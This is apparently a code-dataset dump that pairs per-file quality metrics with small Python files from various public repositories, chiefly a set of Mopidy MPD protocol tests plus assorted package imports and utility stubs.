| 0.822368
| 0.723684
| 0.723684
| 0.723684
| 0.723684
| 0
| 0.0076
| 0.25122
| 1,230
| 57
| 55
| 21.578947
| 0.652552
| 0
| 0
| 0.64
| 0
| 0
| 0.415785
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ef0acb0c55b40c958aa5153eddf0e2969ed17112
| 200
|
py
|
Python
|
workbox/workbox/websetup/schema.py
|
pr3sto/workbox
|
558147a1a387dcfbe03be0fbc366d1d793364da6
|
[
"MIT"
] | null | null | null |
workbox/workbox/websetup/schema.py
|
pr3sto/workbox
|
558147a1a387dcfbe03be0fbc366d1d793364da6
|
[
"MIT"
] | null | null | null |
workbox/workbox/websetup/schema.py
|
pr3sto/workbox
|
558147a1a387dcfbe03be0fbc366d1d793364da6
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Setup the workbox application"""
from __future__ import print_function
def setup_schema(command, conf, vars):
"""Place any commands to setup workbox here"""
pass
| 20
| 50
| 0.69
| 26
| 200
| 5.076923
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006098
| 0.18
| 200
| 9
| 51
| 22.222222
| 0.79878
| 0.465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.333333
| 0.333333
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
ef6531820beadca7641ed3572552b525bd57149a
| 90
|
py
|
Python
|
scorers/__init__.py
|
cipher982/birb-watch
|
bdba5455f3b994b143e96b41afbf17d698610454
|
[
"Apache-2.0"
] | null | null | null |
scorers/__init__.py
|
cipher982/birb-watch
|
bdba5455f3b994b143e96b41afbf17d698610454
|
[
"Apache-2.0"
] | null | null | null |
scorers/__init__.py
|
cipher982/birb-watch
|
bdba5455f3b994b143e96b41afbf17d698610454
|
[
"Apache-2.0"
] | null | null | null |
# __init__.py
from .yolo_v5_torch import YOLOv5Torch
from .yolo_v5_onnx import YOLOv5ONNX
| 22.5
| 38
| 0.844444
| 14
| 90
| 4.857143
| 0.714286
| 0.235294
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 0.111111
| 90
| 3
| 39
| 30
| 0.8
| 0.122222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
32a0120f2a34151af4008810a76eb657656984a4
| 180
|
py
|
Python
|
numpy/stringOperations/numpyFunctionIsNumeric.py
|
slowy07/pythonApps
|
22f9766291dbccd8185035745950c5ee4ebd6a3e
|
[
"MIT"
] | 10
|
2020-10-09T11:05:18.000Z
|
2022-02-13T03:22:10.000Z
|
numpy/stringOperations/numpyFunctionIsNumeric.py
|
khairanabila/pythonApps
|
f90b8823f939b98f7bf1dea7ed35fe6e22e2f730
|
[
"MIT"
] | null | null | null |
numpy/stringOperations/numpyFunctionIsNumeric.py
|
khairanabila/pythonApps
|
f90b8823f939b98f7bf1dea7ed35fe6e22e2f730
|
[
"MIT"
] | 6
|
2020-11-26T12:49:43.000Z
|
2022-03-06T06:46:43.000Z
|
# numpy.isnumeric() function
import numpy as np
# counting a substring
print(np.char.isnumeric('arfyslowy'))
# counting a substring
print(np.char.isnumeric('kloter2surga'))
| 18
| 40
| 0.744444
| 23
| 180
| 5.826087
| 0.565217
| 0.134328
| 0.268657
| 0.343284
| 0.567164
| 0.567164
| 0.567164
| 0
| 0
| 0
| 0
| 0.00641
| 0.133333
| 180
| 10
| 40
| 18
| 0.852564
| 0.377778
| 0
| 0
| 0
| 0
| 0.192661
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
32a33c3b180b7cdff8c332e39a265646e25275bc
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/pexpect/utils.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/pexpect/utils.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/pexpect/utils.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/d6/32/21/cd4ede06f637a5b5b72d9a09842394d8a5aa82dcb91e043a541608a795
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4375
| 0
| 96
| 1
| 96
| 96
| 0.458333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0871422f5bd215c123238e9d64724bc3f4d07976
| 76
|
py
|
Python
|
spikeextractors/extractors/nixioextractors/__init__.py
|
zekearneodo/spikeextractors
|
d30aa85e69d0331fffdb58a03a2bb628f93b405e
|
[
"MIT"
] | 145
|
2018-12-06T23:12:54.000Z
|
2022-02-10T22:57:35.000Z
|
spikeextractors/extractors/nixioextractors/__init__.py
|
zekearneodo/spikeextractors
|
d30aa85e69d0331fffdb58a03a2bb628f93b405e
|
[
"MIT"
] | 396
|
2018-11-26T11:46:30.000Z
|
2022-01-04T07:27:47.000Z
|
spikeextractors/extractors/nixioextractors/__init__.py
|
zekearneodo/spikeextractors
|
d30aa85e69d0331fffdb58a03a2bb628f93b405e
|
[
"MIT"
] | 67
|
2018-11-19T12:38:01.000Z
|
2021-09-25T03:18:22.000Z
|
from .nixioextractors import NIXIORecordingExtractor, NIXIOSortingExtractor
| 38
| 75
| 0.907895
| 5
| 76
| 13.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065789
| 76
| 1
| 76
| 76
| 0.971831
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0876ef7e48c2789c62aa83a7da9b8064b74525de
| 140
|
py
|
Python
|
zenbot/logging/__init__.py
|
Dmunch04/ZenBot
|
5002c20eec70b297cfe8bcce5639e67dbf15fa70
|
[
"MIT"
] | 7
|
2019-06-16T15:54:36.000Z
|
2022-03-28T08:53:49.000Z
|
zenbot/logging/__init__.py
|
Dmunch04/ZenBot
|
5002c20eec70b297cfe8bcce5639e67dbf15fa70
|
[
"MIT"
] | null | null | null |
zenbot/logging/__init__.py
|
Dmunch04/ZenBot
|
5002c20eec70b297cfe8bcce5639e67dbf15fa70
|
[
"MIT"
] | 1
|
2019-06-14T21:42:47.000Z
|
2019-06-14T21:42:47.000Z
|
from .console_logger import ConsoleLogger
from .file_logger import FileLogger
from .logger import Logger
from .logmanager import LogManager
| 28
| 41
| 0.857143
| 18
| 140
| 6.555556
| 0.444444
| 0.305085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 140
| 4
| 42
| 35
| 0.951613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
087d94081293c181da38f987a8b21264bc1cdd9f
| 139
|
py
|
Python
|
tests/traversal/conftest.py
|
spreecode/python-spree-rest
|
877bd2c5dc8fc7efc6c04675939f5b389e5ffd24
|
[
"MIT"
] | null | null | null |
tests/traversal/conftest.py
|
spreecode/python-spree-rest
|
877bd2c5dc8fc7efc6c04675939f5b389e5ffd24
|
[
"MIT"
] | null | null | null |
tests/traversal/conftest.py
|
spreecode/python-spree-rest
|
877bd2c5dc8fc7efc6c04675939f5b389e5ffd24
|
[
"MIT"
] | null | null | null |
import pytest
from .api_structure import APIRoot
@pytest.fixture(scope='module')
def api_root():
return APIRoot(parent=None, ref='')
| 17.375
| 39
| 0.741007
| 19
| 139
| 5.315789
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129496
| 139
| 7
| 40
| 19.857143
| 0.834711
| 0
| 0
| 0
| 0
| 0
| 0.043165
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
088502c4bd646165d46d599ddfadc979954e85ff
| 12,001
|
py
|
Python
|
tests/frontends/mpd/protocol/music_db_test.py
|
swinton/mopidy
|
c32c73f5112c29ef7ccccf36a508c571adb39759
|
[
"Apache-2.0"
] | null | null | null |
tests/frontends/mpd/protocol/music_db_test.py
|
swinton/mopidy
|
c32c73f5112c29ef7ccccf36a508c571adb39759
|
[
"Apache-2.0"
] | null | null | null |
tests/frontends/mpd/protocol/music_db_test.py
|
swinton/mopidy
|
c32c73f5112c29ef7ccccf36a508c571adb39759
|
[
"Apache-2.0"
] | null | null | null |
from tests.frontends.mpd import protocol
class MusicDatabaseHandlerTest(protocol.BaseTestCase):
def test_count(self):
self.sendRequest(u'count "tag" "needle"')
self.assertInResponse(u'songs: 0')
self.assertInResponse(u'playtime: 0')
self.assertInResponse(u'OK')
def test_findadd(self):
self.sendRequest(u'findadd "album" "what"')
self.assertInResponse(u'OK')
def test_listall(self):
self.sendRequest(u'listall "file:///dev/urandom"')
self.assertEqualResponse(u'ACK [0@0] {} Not implemented')
def test_listallinfo(self):
self.sendRequest(u'listallinfo "file:///dev/urandom"')
self.assertEqualResponse(u'ACK [0@0] {} Not implemented')
def test_lsinfo_without_path_returns_same_as_listplaylists(self):
lsinfo_response = self.sendRequest(u'lsinfo')
listplaylists_response = self.sendRequest(u'listplaylists')
self.assertEqual(lsinfo_response, listplaylists_response)
def test_lsinfo_with_empty_path_returns_same_as_listplaylists(self):
lsinfo_response = self.sendRequest(u'lsinfo ""')
listplaylists_response = self.sendRequest(u'listplaylists')
self.assertEqual(lsinfo_response, listplaylists_response)
def test_lsinfo_for_root_returns_same_as_listplaylists(self):
lsinfo_response = self.sendRequest(u'lsinfo "/"')
listplaylists_response = self.sendRequest(u'listplaylists')
self.assertEqual(lsinfo_response, listplaylists_response)
def test_update_without_uri(self):
self.sendRequest(u'update')
self.assertInResponse(u'updating_db: 0')
self.assertInResponse(u'OK')
def test_update_with_uri(self):
self.sendRequest(u'update "file:///dev/urandom"')
self.assertInResponse(u'updating_db: 0')
self.assertInResponse(u'OK')
def test_rescan_without_uri(self):
self.sendRequest(u'rescan')
self.assertInResponse(u'updating_db: 0')
self.assertInResponse(u'OK')
def test_rescan_with_uri(self):
self.sendRequest(u'rescan "file:///dev/urandom"')
self.assertInResponse(u'updating_db: 0')
self.assertInResponse(u'OK')
class MusicDatabaseFindTest(protocol.BaseTestCase):
def test_find_album(self):
self.sendRequest(u'find "album" "what"')
self.assertInResponse(u'OK')
def test_find_album_without_quotes(self):
self.sendRequest(u'find album "what"')
self.assertInResponse(u'OK')
def test_find_artist(self):
self.sendRequest(u'find "artist" "what"')
self.assertInResponse(u'OK')
def test_find_artist_without_quotes(self):
self.sendRequest(u'find artist "what"')
self.assertInResponse(u'OK')
def test_find_title(self):
self.sendRequest(u'find "title" "what"')
self.assertInResponse(u'OK')
def test_find_title_without_quotes(self):
self.sendRequest(u'find title "what"')
self.assertInResponse(u'OK')
def test_find_date(self):
self.sendRequest(u'find "date" "2002-01-01"')
self.assertInResponse(u'OK')
def test_find_date_without_quotes(self):
self.sendRequest(u'find date "2002-01-01"')
self.assertInResponse(u'OK')
def test_find_date_with_capital_d_and_incomplete_date(self):
self.sendRequest(u'find Date "2005"')
self.assertInResponse(u'OK')
def test_find_else_should_fail(self):
self.sendRequest(u'find "somethingelse" "what"')
self.assertEqualResponse(u'ACK [2@0] {find} incorrect arguments')
def test_find_album_and_artist(self):
self.sendRequest(u'find album "album_what" artist "artist_what"')
self.assertInResponse(u'OK')
class MusicDatabaseListTest(protocol.BaseTestCase):
def test_list_foo_returns_ack(self):
self.sendRequest(u'list "foo"')
self.assertEqualResponse(u'ACK [2@0] {list} incorrect arguments')
### Artist
def test_list_artist_with_quotes(self):
self.sendRequest(u'list "artist"')
self.assertInResponse(u'OK')
def test_list_artist_without_quotes(self):
self.sendRequest(u'list artist')
self.assertInResponse(u'OK')
def test_list_artist_without_quotes_and_capitalized(self):
self.sendRequest(u'list Artist')
self.assertInResponse(u'OK')
def test_list_artist_with_query_of_one_token(self):
self.sendRequest(u'list "artist" "anartist"')
self.assertEqualResponse(
u'ACK [2@0] {list} should be "Album" for 3 arguments')
def test_list_artist_with_unknown_field_in_query_returns_ack(self):
self.sendRequest(u'list "artist" "foo" "bar"')
self.assertEqualResponse(u'ACK [2@0] {list} not able to parse args')
def test_list_artist_by_artist(self):
self.sendRequest(u'list "artist" "artist" "anartist"')
self.assertInResponse(u'OK')
def test_list_artist_by_album(self):
self.sendRequest(u'list "artist" "album" "analbum"')
self.assertInResponse(u'OK')
def test_list_artist_by_full_date(self):
self.sendRequest(u'list "artist" "date" "2001-01-01"')
self.assertInResponse(u'OK')
def test_list_artist_by_year(self):
self.sendRequest(u'list "artist" "date" "2001"')
self.assertInResponse(u'OK')
def test_list_artist_by_genre(self):
self.sendRequest(u'list "artist" "genre" "agenre"')
self.assertInResponse(u'OK')
def test_list_artist_by_artist_and_album(self):
self.sendRequest(
u'list "artist" "artist" "anartist" "album" "analbum"')
self.assertInResponse(u'OK')
### Album
def test_list_album_with_quotes(self):
self.sendRequest(u'list "album"')
self.assertInResponse(u'OK')
def test_list_album_without_quotes(self):
self.sendRequest(u'list album')
self.assertInResponse(u'OK')
def test_list_album_without_quotes_and_capitalized(self):
self.sendRequest(u'list Album')
self.assertInResponse(u'OK')
def test_list_album_with_artist_name(self):
self.sendRequest(u'list "album" "anartist"')
self.assertInResponse(u'OK')
def test_list_album_by_artist(self):
self.sendRequest(u'list "album" "artist" "anartist"')
self.assertInResponse(u'OK')
def test_list_album_by_album(self):
self.sendRequest(u'list "album" "album" "analbum"')
self.assertInResponse(u'OK')
def test_list_album_by_full_date(self):
self.sendRequest(u'list "album" "date" "2001-01-01"')
self.assertInResponse(u'OK')
def test_list_album_by_year(self):
self.sendRequest(u'list "album" "date" "2001"')
self.assertInResponse(u'OK')
def test_list_album_by_genre(self):
self.sendRequest(u'list "album" "genre" "agenre"')
self.assertInResponse(u'OK')
def test_list_album_by_artist_and_album(self):
self.sendRequest(
u'list "album" "artist" "anartist" "album" "analbum"')
self.assertInResponse(u'OK')
### Date
def test_list_date_with_quotes(self):
self.sendRequest(u'list "date"')
self.assertInResponse(u'OK')
def test_list_date_without_quotes(self):
self.sendRequest(u'list date')
self.assertInResponse(u'OK')
def test_list_date_without_quotes_and_capitalized(self):
self.sendRequest(u'list Date')
self.assertInResponse(u'OK')
def test_list_date_with_query_of_one_token(self):
self.sendRequest(u'list "date" "anartist"')
self.assertEqualResponse(
u'ACK [2@0] {list} should be "Album" for 3 arguments')
def test_list_date_by_artist(self):
self.sendRequest(u'list "date" "artist" "anartist"')
self.assertInResponse(u'OK')
def test_list_date_by_album(self):
self.sendRequest(u'list "date" "album" "analbum"')
self.assertInResponse(u'OK')
def test_list_date_by_full_date(self):
self.sendRequest(u'list "date" "date" "2001-01-01"')
self.assertInResponse(u'OK')
def test_list_date_by_year(self):
self.sendRequest(u'list "date" "date" "2001"')
self.assertInResponse(u'OK')
def test_list_date_by_genre(self):
self.sendRequest(u'list "date" "genre" "agenre"')
self.assertInResponse(u'OK')
def test_list_date_by_artist_and_album(self):
self.sendRequest(u'list "date" "artist" "anartist" "album" "analbum"')
self.assertInResponse(u'OK')
### Genre
def test_list_genre_with_quotes(self):
self.sendRequest(u'list "genre"')
self.assertInResponse(u'OK')
def test_list_genre_without_quotes(self):
self.sendRequest(u'list genre')
self.assertInResponse(u'OK')
def test_list_genre_without_quotes_and_capitalized(self):
self.sendRequest(u'list Genre')
self.assertInResponse(u'OK')
def test_list_genre_with_query_of_one_token(self):
self.sendRequest(u'list "genre" "anartist"')
self.assertEqualResponse(
u'ACK [2@0] {list} should be "Album" for 3 arguments')
def test_list_genre_by_artist(self):
self.sendRequest(u'list "genre" "artist" "anartist"')
self.assertInResponse(u'OK')
def test_list_genre_by_album(self):
self.sendRequest(u'list "genre" "album" "analbum"')
self.assertInResponse(u'OK')
def test_list_genre_by_full_date(self):
self.sendRequest(u'list "genre" "date" "2001-01-01"')
self.assertInResponse(u'OK')
def test_list_genre_by_year(self):
self.sendRequest(u'list "genre" "date" "2001"')
self.assertInResponse(u'OK')
def test_list_genre_by_genre(self):
self.sendRequest(u'list "genre" "genre" "agenre"')
self.assertInResponse(u'OK')
def test_list_genre_by_artist_and_album(self):
self.sendRequest(
u'list "genre" "artist" "anartist" "album" "analbum"')
self.assertInResponse(u'OK')
class MusicDatabaseSearchTest(protocol.BaseTestCase):
def test_search_album(self):
self.sendRequest(u'search "album" "analbum"')
self.assertInResponse(u'OK')
def test_search_album_without_quotes(self):
self.sendRequest(u'search album "analbum"')
self.assertInResponse(u'OK')
def test_search_artist(self):
self.sendRequest(u'search "artist" "anartist"')
self.assertInResponse(u'OK')
def test_search_artist_without_quotes(self):
self.sendRequest(u'search artist "anartist"')
self.assertInResponse(u'OK')
def test_search_filename(self):
self.sendRequest(u'search "filename" "afilename"')
self.assertInResponse(u'OK')
def test_search_filename_without_quotes(self):
self.sendRequest(u'search filename "afilename"')
self.assertInResponse(u'OK')
def test_search_title(self):
self.sendRequest(u'search "title" "atitle"')
self.assertInResponse(u'OK')
def test_search_title_without_quotes(self):
self.sendRequest(u'search title "atitle"')
self.assertInResponse(u'OK')
def test_search_any(self):
self.sendRequest(u'search "any" "anything"')
self.assertInResponse(u'OK')
def test_search_any_without_quotes(self):
self.sendRequest(u'search any "anything"')
self.assertInResponse(u'OK')
def test_search_date(self):
self.sendRequest(u'search "date" "2002-01-01"')
self.assertInResponse(u'OK')
def test_search_date_without_quotes(self):
self.sendRequest(u'search date "2002-01-01"')
self.assertInResponse(u'OK')
def test_search_date_with_capital_d_and_incomplete_date(self):
self.sendRequest(u'search Date "2005"')
self.assertInResponse(u'OK')
def test_search_else_should_fail(self):
self.sendRequest(u'search "sometype" "something"')
self.assertEqualResponse(u'ACK [2@0] {search} incorrect arguments')
| 34.785507
| 78
| 0.677944
| 1,525
| 12,001
| 5.107541
| 0.07082
| 0.155989
| 0.166389
| 0.192579
| 0.909103
| 0.894595
| 0.848376
| 0.758377
| 0.660419
| 0.532289
| 0
| 0.011967
| 0.199233
| 12,001
| 344
| 79
| 34.886628
| 0.798543
| 0.001917
| 0
| 0.34252
| 0
| 0
| 0.203009
| 0.00702
| 0
| 0
| 0
| 0
| 0.330709
| 1
| 0.307087
| false
| 0
| 0.003937
| 0
| 0.326772
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0885a8b54234a768b7933381df363f8443bffe68
| 137
|
py
|
Python
|
drawBot/context/dummyContext.py
|
musca1997/drawbot
|
d5b990c74289ba437e81933423a09b0e4839494c
|
[
"BSD-2-Clause"
] | 18
|
2015-10-10T00:46:12.000Z
|
2020-05-25T02:13:54.000Z
|
drawBot/context/dummyContext.py
|
musca1997/drawbot
|
d5b990c74289ba437e81933423a09b0e4839494c
|
[
"BSD-2-Clause"
] | 10
|
2017-05-05T00:12:29.000Z
|
2021-11-17T18:29:22.000Z
|
drawBot/context/dummyContext.py
|
musca1997/drawbot
|
d5b990c74289ba437e81933423a09b0e4839494c
|
[
"BSD-2-Clause"
] | 6
|
2015-10-11T01:07:10.000Z
|
2021-09-01T15:02:56.000Z
|
from __future__ import absolute_import, print_function
from .baseContext import BaseContext
class DummyContext(BaseContext):
pass
| 15.222222
| 54
| 0.824818
| 15
| 137
| 7.133333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138686
| 137
| 8
| 55
| 17.125
| 0.90678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0.25
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
08a64d3828d8d5429dc951e51555be19adb949ba
| 187
|
py
|
Python
|
candphy/__init__.py
|
perseu912/candphy
|
e50fc29b1913e465a1473da0ef9d9a44239e2590
|
[
"MIT"
] | null | null | null |
candphy/__init__.py
|
perseu912/candphy
|
e50fc29b1913e465a1473da0ef9d9a44239e2590
|
[
"MIT"
] | null | null | null |
candphy/__init__.py
|
perseu912/candphy
|
e50fc29b1913e465a1473da0ef9d9a44239e2590
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
####################
#### Reinan Br. ####
## 02/11/21 23:51 ##
##### candphy ######
####################
from .logs import log,show_console
| 20.777778
| 34
| 0.427807
| 21
| 187
| 3.761905
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07362
| 0.128342
| 187
| 9
| 34
| 20.777778
| 0.411043
| 0.42246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3ef1616793ab0fb4065e5df4c99dec901c912828
| 105
|
py
|
Python
|
xoodyak/pyxoodyak/utils.py
|
rishubn/bluelight
|
b6df36d2729fd086d5c344392c471d7d0f1386dc
|
[
"Apache-2.0"
] | null | null | null |
xoodyak/pyxoodyak/utils.py
|
rishubn/bluelight
|
b6df36d2729fd086d5c344392c471d7d0f1386dc
|
[
"Apache-2.0"
] | null | null | null |
xoodyak/pyxoodyak/utils.py
|
rishubn/bluelight
|
b6df36d2729fd086d5c344392c471d7d0f1386dc
|
[
"Apache-2.0"
] | null | null | null |
import random
def rand_bytes(n: int) -> bytes:
return bytes(random.getrandbits(8) for _ in range(n))
| 26.25
| 57
| 0.714286
| 17
| 105
| 4.294118
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011364
| 0.161905
| 105
| 4
| 57
| 26.25
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
410b0a0f66c7f84d27515ba8627b4ba10eb26da6
| 67
|
py
|
Python
|
gacha/utils/__init__.py
|
rexor12/gacha
|
946f31adb40f3184ce4ddd447439bbd5421d3506
|
[
"MIT"
] | 1
|
2021-01-09T09:32:06.000Z
|
2021-01-09T09:32:06.000Z
|
gacha/utils/__init__.py
|
rexor12/gacha.py
|
946f31adb40f3184ce4ddd447439bbd5421d3506
|
[
"MIT"
] | 2
|
2020-12-26T00:29:33.000Z
|
2020-12-26T22:23:10.000Z
|
gacha/utils/__init__.py
|
rexor12/gacha
|
946f31adb40f3184ce4ddd447439bbd5421d3506
|
[
"MIT"
] | 1
|
2021-11-28T15:44:01.000Z
|
2021-11-28T15:44:01.000Z
|
from .dict_utils import get_or_add
from .float_utils import isclose
| 33.5
| 34
| 0.865672
| 12
| 67
| 4.5
| 0.75
| 0.407407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104478
| 67
| 2
| 35
| 33.5
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
eb07480be68067b7a990039599890f36800ed565
| 38
|
py
|
Python
|
scrapper/steam/__init__.py
|
gghf-service/gghf-api
|
9740700d1dd160e90fc949f9c3e652c3483a49aa
|
[
"MIT"
] | 1
|
2018-12-10T14:37:11.000Z
|
2018-12-10T14:37:11.000Z
|
scrapper/steam/__init__.py
|
tapkain/gghf.api
|
9740700d1dd160e90fc949f9c3e652c3483a49aa
|
[
"MIT"
] | null | null | null |
scrapper/steam/__init__.py
|
tapkain/gghf.api
|
9740700d1dd160e90fc949f9c3e652c3483a49aa
|
[
"MIT"
] | null | null | null |
from scrapper.steam.spider import main
| 38
| 38
| 0.868421
| 6
| 38
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 38
| 1
| 38
| 38
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
eb09a6ebaf29c9c49e8eef842efb9adb832fd625
| 34,660
|
py
|
Python
|
Pandemic Warrior/main/Fact_Checker_gui.py
|
varunkm192002/Pandemic-Warrior
|
04481b74ebacb0086733a2084bbdf6dbb15c1d1f
|
[
"BSD-3-Clause"
] | null | null | null |
Pandemic Warrior/main/Fact_Checker_gui.py
|
varunkm192002/Pandemic-Warrior
|
04481b74ebacb0086733a2084bbdf6dbb15c1d1f
|
[
"BSD-3-Clause"
] | null | null | null |
